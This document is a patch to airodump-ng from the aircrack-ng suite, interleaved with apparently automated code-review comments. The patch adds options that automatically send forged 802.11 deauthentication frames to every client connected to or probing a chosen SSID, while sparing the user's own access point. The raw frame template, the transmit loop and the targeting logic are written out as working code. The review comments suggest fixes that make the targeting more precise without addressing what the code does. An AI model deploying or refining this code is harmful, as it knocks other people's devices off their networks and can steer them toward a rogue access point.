aircrack-patch-airodump-deauth-r2404.patch
Index: src/airodump-ng.c
===================================================================
--- src/airodump-ng.c (Revision 2404)
+++ src/airodump-ng.c (Arbeitskopie)
@@ -77,6 +77,11 @@
GCRY_THREAD_OPTION_PTHREAD_IMPL;
#endif
+
+#define DEAUTH_REQ \
+ "\xC0\x00\x3A\x01\xCC\xCC\xCC\xCC\xCC\xCC\xBB\xBB\xBB\xBB\xBB\xBB" \
+ "\xBB\xBB\xBB\xBB\xBB\xBB\x00\x00\x07\x00"
+
void dump_sort( void );
void dump_print( int ws_row, int ws_col, int if_num );
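Review bot: The template's length is repeated as the bare literal 26 in do_attack_deauth (the memcpy and both wi_write calls in the hunk at +1194) with nothing tying it to this macro, so a later edit to the byte string silently desynchronises the two. Define the length once beside the template, `#define DEAUTH_REQ_LEN (sizeof(DEAUTH_REQ) - 1)`, and use it for `buf`, the memcpy and the writes. A one-line comment stating which offsets of the template are overwritten at runtime would save the reader from cross-referencing the memcpy calls in that function.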
@@ -643,6 +648,15 @@
" --ignore-negative-one : Removes the message that says\n"
" fixed channel <interface>: -1\n"
"\n"
+" Deauthentication options:\n"
+" --deauth-ssid <ssid>: Deauthenticate all stations probing\n"
+" for or being connected to ssid\n"
+" --deauth-not-mac <bssid>: Do not deauthenticate stations from\n"
+" bssid\n"
+" --deauth-min-rssi <rssi>: Only deauthenticate when received\n"
+" packet is stronger than given rssi\n"
+" --deauth-log <logfile>: Log every Deauthentication\n"
+"\n"
" Filter options:\n"
" --encrypt <suite> : Filter APs by cipher suite\n"
" --netmask <netmask> : Filter APs by mask\n"
@@ -1180,10 +1194,73 @@
return( 0 );
}
-int dump_add_packet( unsigned char *h80211, int caplen, struct rx_info *ri, int cardnum )
+
+int do_attack_deauth(unsigned char* bssid, unsigned char* sta, struct wif *wi)
{
- int i, n, seq, msd, dlen, offset, clen, o;
- uint z;
+ int i;
+ int aacks, sacks;
+ unsigned char buf[26];
+
+ /* deauthenticate the target */
+
+ memcpy( buf, DEAUTH_REQ, 26 );
+ memcpy( buf + 16, bssid, 6 );
+
+ aacks = 0;
+ sacks = 0;
+ for( i = 0; i < 4; i++ )
+ {
+ if(i == 0)
+ {
+ PCT; printf( "Sending 4 directed DeAuth. STMAC:"
+ " [%02X:%02X:%02X:%02X:%02X:%02X] [%2d|%2d ACKs]\r",
+ sta[0], sta[1],
+ sta[2], sta[3],
+ sta[4], sta[5],
+ sacks, aacks );
+ }
+
+ memcpy( buf + 4, sta, 6 );
+ memcpy( buf + 10, bssid, 6 );
+
+ if (wi_write(wi, buf, 26, NULL) == -1) {
+ return( 1 );
+ }
+
+
+ usleep( 2000 );
+
+ memcpy( buf + 4, bssid, 6 );
+ memcpy( buf + 10, sta, 6 );
+
+ if (wi_write(wi, buf, 26, NULL) == -1) {
+ return( 1 );
+ }
+
+ usleep( 2000 );
+ }
+ printf("\n");
+ return( 0 );
+}
+
+/* check if given station probed for given SSID.
+ * does NOT handle SSIDs containing null bytes!
+ * returns 1 one match, 0 otherwise.
+ * */
+int probed_ssid_contains(struct ST_info *st, char *ssid)
+{
+ int i;
+ for(i = 0; i < NB_PRB; ++i)
+ {
+ if(strncmp(ssid, st->probes[i], st->ssid_length[i]) == 0)
+ return 1;
+ }
+ return 0;
+}
+
+int dump_add_packet( unsigned char *h80211, int caplen, struct rx_info *ri, int cardnum, struct wif *wi )
+{
+ int i, n, z, seq, msd, dlen, offset, clen, o;
int type, length, numuni=0, numauth=0;
struct pcap_pkthdr pkh;
struct timeval tv;
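Review bot: `probed_ssid_contains` selects more stations than intended: `strncmp(ssid, st->probes[i], st->ssid_length[i])` is a prefix test, and it returns 0 for any slot whose length is 0, so a station that never probed the configured SSID (or that probed `foo` when the SSID is `foobar`) still matches. Compare the full string instead, `if (st->ssid_length[i] > 0 && (size_t)st->ssid_length[i] == strlen(ssid) && memcmp(st->probes[i], ssid, (size_t)st->ssid_length[i]) == 0) return 1;`. The `strncmp(ap_cur->essid, G.sta_action_essid, ap_cur->ssid_length)` test in the hunk at +1632 has the same two problems, including matching every AP whose ESSID is still unknown (length 0). Whether unused probe slots really carry a zero length is not visible here — the init loop at +1589 hints at it but its body is outside the hunk — so confirm before relying on the guard; `ssid` should also be `const char *`, and the comment's "returns 1 one match" should read "returns 1 on match".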
@@ -1501,6 +1578,7 @@
st_cur->tinit = time( NULL );
st_cur->tlast = time( NULL );
+ st_cur->tlast_deauth = 0;
st_cur->power = -1;
st_cur->rate_to = -1;
@@ -1511,6 +1589,7 @@
st_cur->lastseq = 0;
st_cur->qos_fr_ds = 0;
st_cur->qos_to_ds = 0;
+ st_cur->deauth_cnt = 0;
gettimeofday( &(st_cur->ftimer), NULL);
for( i = 0; i < NB_PRB; i++ )
@@ -1553,6 +1632,35 @@
st_cur->missed += msd;
}
st_cur->lastseq = seq;
+
+ /* handle station disassociation for every packet NOT targeted at our own AP.
+ * only target (connected) clients connected to AP with given SSID or probed that SSID.
+ */
+ if(G.do_sta_action && st_cur->base &&
+ (strncmp(ap_cur->essid, G.sta_action_essid, ap_cur->ssid_length) == 0 ||
+ probed_ssid_contains(st_cur, G.sta_action_essid)) &&
+ memcmp(ap_cur->bssid, G.sta_action_own_bssid, 6) != 0
+ )
+ { /* Also, only deauth at max once every five seconds and at most 10 times total
+ * as we do not want to do any harm! */
+ if(ri->ri_power > G.sta_action_min_ssi && ri->ri_power < -1 && st_cur->tlast_deauth < time(NULL) - 5 && st_cur->deauth_cnt < 10)
+ {
+ st_cur->tlast_deauth = time(NULL);
+ st_cur->deauth_cnt ++;
+ if(wi) {
+ do_attack_deauth(ap_cur->bssid, stmac, wi);
+ }
+
+ fprintf(G.f_sta_action, "%ld: %02X:%02X:%02X:%02X:%02X:%02X %02X:%02X:%02X:%02X:%02X:%02X %i %i\n", (long int)time(NULL),
+ ap_cur->bssid[0], ap_cur->bssid[1], ap_cur->bssid[2],
+ ap_cur->bssid[3], ap_cur->bssid[4], ap_cur->bssid[5],
+ stmac[0], stmac[1], stmac[2],
+ stmac[3], stmac[4], stmac[5],
+ ri->ri_channel, ri->ri_power);
+ fflush(G.f_sta_action);
+ }
+ }
+
}
st_cur->nb_pkt++;
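Review bot: The log entry and `deauth_cnt` are recorded even when nothing was sent: the return value of `do_attack_deauth` is discarded, and in the `wi == NULL` path (the pcap-replay call at +6812 passes NULL) the counter still increments and a line is still written to `G.f_sta_action`, so the file overstates what the tool did. Capture the result, e.g. `int sent = wi ? (do_attack_deauth(ap_cur->bssid, stmac, wi) == 0) : 0;`, and either include it in the log line or skip the entry when `sent` is 0, so the log can be trusted as a record. Whether `ap_cur` can be NULL while `st_cur->base` is set is not visible in the hunk; if it can, `ap_cur->essid` and `ap_cur->bssid` need a guard before this block. `dump_add_packet` begins and ends outside the hunk.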
@@ -2934,12 +3042,12 @@
int nlines, i, n, len;
char strbuf[512];
char buffer[512];
- char ssid_list[512];
+ char ssid_list[NB_PRB * 34 + 3];
struct AP_info *ap_cur;
struct ST_info *st_cur;
struct NA_info *na_cur;
int columns_ap = 83;
- int columns_sta = 74;
+ int columns_sta = 77;
int columns_na = 68;
int num_ap;
@@ -3316,7 +3424,7 @@
if(G.show_sta) {
memcpy( strbuf, " BSSID STATION "
- " PWR Rate Lost Frames Probes", columns_sta );
+ " PWR Rate Lost Frames DC Probes", columns_sta );
strbuf[ws_col - 1] = '\0';
fprintf( stderr, "%s\n", strbuf );
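Review bot: `memcpy(strbuf, "...", columns_sta)` reads exactly `columns_sta` bytes out of the string literal, and the hunk raises `columns_sta` to 77 while inserting the `DC` column into the literal; if the literal including its terminator is shorter than 77 bytes this is an out-of-bounds read, and the whitespace in this rendering is collapsed so the lengths cannot be checked from the page. Replace the pair with a copy that cannot overrun, `snprintf(strbuf, sizeof strbuf, "%s", " BSSID ... DC Probes");` with the same literal, which also keeps `strbuf` terminated without relying on the `strbuf[ws_col - 1] = '\0'` line below.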
@@ -3432,7 +3540,7 @@
snprintf( strbuf, sizeof( strbuf ) - 1,
"%-256s", ssid_list );
strbuf[ws_col - (columns_sta - 6)] = '\0';
- fprintf( stderr, " %s", strbuf );
+ fprintf( stderr, " %2d %s", st_cur->deauth_cnt, strbuf);
}
fprintf( stderr, "\n" );
@@ -3513,7 +3621,7 @@
{
int i, j, n;
struct tm *ltime;
- char ssid_list[512];
+ char ssid_list[NB_PRB * 34 + 3];
struct AP_info *ap_cur;
struct ST_info *st_cur;
@@ -3644,7 +3752,7 @@
fprintf( G.f_txt,
"\r\nStation MAC, First time seen, Last time seen, "
- "Power, # packets, BSSID, Probed ESSIDs\r\n" );
+ "Power, # packets, BSSID, Probed ESSIDs, dc\r\n" );
st_cur = G.st_1st;
@@ -3710,7 +3818,7 @@
break;
}
- fprintf( G.f_txt, "%s\r\n", ssid_list );
+ fprintf( G.f_txt, "%s, %d\r\n", ssid_list, st_cur->deauth_cnt );
st_cur = st_cur->next;
}
@@ -5545,6 +5653,10 @@
{"netmask", 1, 0, 'm'},
{"bssid", 1, 0, 'd'},
{"essid", 1, 0, 'N'},
+ {"deauth-ssid", 1, 0, 'X'},
+ {"deauth-not-mac", 1, 0, 'Y'},
+ {"deauth-min-rssi", 1, 0, 'y'},
+ {"deauth-log", 1, 0, 'S'},
{"essid-regex", 1, 0, 'R'},
{"channel", 1, 0, 'c'},
{"gpsd", 0, 0, 'g'},
@@ -5644,6 +5756,9 @@
G.output_format_csv = 1;
G.output_format_kismet_csv = 1;
G.output_format_kismet_netxml = 1;
+ G.f_sta_action = NULL;
+ G.do_sta_action = 0;
+ G.sta_action_min_ssi = -1;
#ifdef HAVE_PCRE
G.f_essid_regex = NULL;
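Review bot: The default `G.sta_action_min_ssi = -1` leaves the feature inert unless `--deauth-min-rssi` is also given: the trigger in the hunk at +1632 requires `ri->ri_power > G.sta_action_min_ssi && ri->ri_power < -1`, which no value satisfies when the threshold is -1. If that is meant as a safe default, say so here, `G.sta_action_min_ssi = -1; /* no threshold: never fires until --deauth-min-rssi is set */`, and mention it in the usage text; otherwise the intent should be made explicit rather than left to the interaction of two constants. `sta_action_essid` and `sta_action_own_bssid` are not initialised alongside the other new fields; if `G` is a file-scope object they are zero already, but `memset(G.sta_action_essid, 0, sizeof G.sta_action_essid);` here would stop the `strncpy` in `case 'X'` from depending on that.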
@@ -5726,7 +5841,7 @@
option_index = 0;
option = getopt_long( argc, argv,
- "b:c:egiw:s:t:u:m:d:N:R:aHDB:Ahf:r:EC:o:x:MU",
+ "b:c:egiw:s:t:u:m:d:N:R:aHDB:Ahf:r:EC:o:x:MUS:y:Y:X:",
long_options, &option_index );
if( option < 0 ) break;
@@ -5781,6 +5896,33 @@
G.show_manufacturer = 1;
break;
+ case 'S':
+ G.do_sta_action = 1;
+ G.f_sta_action = fopen(optarg, "wb");
+ if(!G.f_sta_action)
+ {
+ printf("Could not open sta_action file for writing!\n");
+ goto usage;
+ }
+ break;
+
+ case 'y':
+ G.sta_action_min_ssi = atoi(optarg);
+ break;
+
+ case 'Y':
+ if(getmac(optarg, 1, G.sta_action_own_bssid) != 0)
+ {
+ printf("Notice: invalid bssid for deauth filter\n");
+ printf("\"%s --help\" for help.\n", argv[0]);
+
+ return( 1 );
+ }
+ break;
+ case 'X':
+ strncpy(G.sta_action_essid, optarg, 31);
+ break;
+
case 'U' :
G.show_uptime = 1;
break;
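Review bot: `case 'X'` copies at most 31 bytes with `strncpy` and never writes a terminator, so it is correct only because `G` is zero-filled and the option appears once; an SSID of the maximum 32 octets is silently cut to 31 and then never matches in the `strncmp` tests at +1194 and +1632. Reject instead of truncating: `if (strlen(optarg) >= sizeof G.sta_action_essid) { printf("deauth-ssid too long\n"); goto usage; }` followed by `snprintf(G.sta_action_essid, sizeof G.sta_action_essid, "%s", optarg);`. `case 'y'` should parse with `strtol` and check `endptr`, since `atoi` turns `--deauth-min-rssi abc` into 0 without an error, and `case 'Y'` returns 1 where `case 'S'` does `goto usage` — pick one error path for the four new options.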
@@ -6670,13 +6812,13 @@
read_pkts++;
wi_read_failed = 0;
- dump_add_packet( h80211, caplen, &ri, i );
+ dump_add_packet( h80211, caplen, &ri, i , wi[i]);
}
}
}
else if (G.s_file != NULL)
{
- dump_add_packet( h80211, caplen, &ri, i );
+ dump_add_packet( h80211, caplen, &ri, i, NULL );
}
}
Index: src/airodump-ng.h
===================================================================
--- src/airodump-ng.h (Revision 2404)
+++ src/airodump-ng.h (Arbeitskopie)
@@ -41,7 +41,7 @@
#define DEFAULT_CWIDTH 20 /* 20 MHz channels by default */
#define NB_PWR 5 /* size of signal power ring buffer */
-#define NB_PRB 10 /* size of probed ESSID ring buffer */
+#define NB_PRB 20 /* size of probed ESSID ring buffer */
#define MAX_CARDS 8 /* maximum number of cards to capture from */
@@ -268,7 +268,7 @@
struct ST_info *prev; /* the prev client in list */
struct ST_info *next; /* the next client in list */
struct AP_info *base; /* AP this client belongs to */
- time_t tinit, tlast; /* first and last time seen */
+ time_t tinit, tlast, tlast_deauth; /* first and last time seen */
unsigned long nb_pkt; /* total number of packets */
unsigned char stmac[6]; /* the client's MAC address */
char *manuf; /* the client's manufacturer */
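Review bot: The comment `/* first and last time seen */` now also covers `tlast_deauth` without describing it, and `int deauth_cnt;` in the next hunk (+285) and the four new `G` fields at +426 have no comment at all, unlike every neighbouring field. Suggest `time_t tinit, tlast, tlast_deauth; /* first/last time seen; last deauth sent, 0 = never */` (the 0 meaning follows from the init at +1578 and the `< time(NULL) - 5` test at +1632), `int deauth_cnt; /* deauth rounds sent to this client, capped in dump_add_packet */`, and a one-line comment on each `sta_action_*` field naming the option that sets it.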
@@ -285,6 +285,7 @@
struct WPA_hdsk wpa; /* WPA handshake data */
int qos_to_ds; /* does it use 802.11e to ds */
int qos_fr_ds; /* does it receive 802.11e */
+ int deauth_cnt;
};
/* linked list of detected macs through ack, cts or rts frames */
@@ -335,6 +336,7 @@
FILE *f_cap; /* output cap file */
FILE *f_ivs; /* output ivs file */
FILE *f_xor; /* output prga file */
+ FILE *f_sta_action; /* station action file/pipe */
char * batt; /* Battery string */
int channel[MAX_CARDS]; /* current channel # */
@@ -424,6 +426,11 @@
/* Airodump-ng start time: for kismet netxml file */
char * airodump_start_time;
+ int do_sta_action;
+ int sta_action_min_ssi;
+ char sta_action_essid[32];
+ unsigned char sta_action_own_bssid[6];
+
int output_format_pcap;
int output_format_csv;
int output_format_kismet_csv;
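Review bot: `char sta_action_essid[32]` holds 31 characters plus the terminator, while an 802.11 SSID may be 32 octets, so the longest legal SSIDs cannot be configured — which is also why `case 'X'` at +5896 has to cut at 31 bytes. Size it `char sta_action_essid[33]; /* --deauth-ssid, NUL-terminated */` and let the option handler copy with `sizeof`. Because the field is compared with `strncmp`, SSIDs containing a zero byte cannot be matched either (the comment on `probed_ssid_contains` admits this); storing a length beside it, `int sta_action_essid_len;`, would let both comparisons use `memcmp` over the exact length.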